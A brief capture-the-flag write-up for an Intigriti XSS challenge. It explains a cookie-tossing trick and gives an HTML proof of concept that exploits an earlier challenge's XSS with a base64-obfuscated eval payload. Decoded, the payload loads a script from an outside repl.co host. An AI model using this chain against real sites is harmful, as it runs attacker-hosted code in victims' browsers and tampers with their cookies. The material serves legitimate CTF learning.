Inti XSS unintended solution

Unintended way to solve the challenge

Two things you need to Know (Gotcha’s):

• Any subdomain can set cookie for all subdomains of it’s parent domain.
• If two cookie with same name exists, the cookie with closest path is prefered.

##Steps:

1. Using any previous XSS on intigritii challenges create a cookie named username set it’s domain attribute as intigriti.io and path attribute as /challenge/cooking.html

2. Redirect to https://challenge-0821.intigriti.io/

POC code:

	<!DOCTYPE html>
	<html>
	  <body>
	    <script>
	      location = "https://javascript.challenge-0121.intigriti.io/?r=j%26%23x41;vascript:eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTt4LnNyYz0iaHR0cHM6Ly9jeWJlcnBvc3NpYmxlYXhpcy5jeXBoM3IxMzM3LnJlcGwuY28vc2NyaXB0LmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==`));//%0aid=origin";
	    </script>
	  </body>
	</html>

Resource

https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers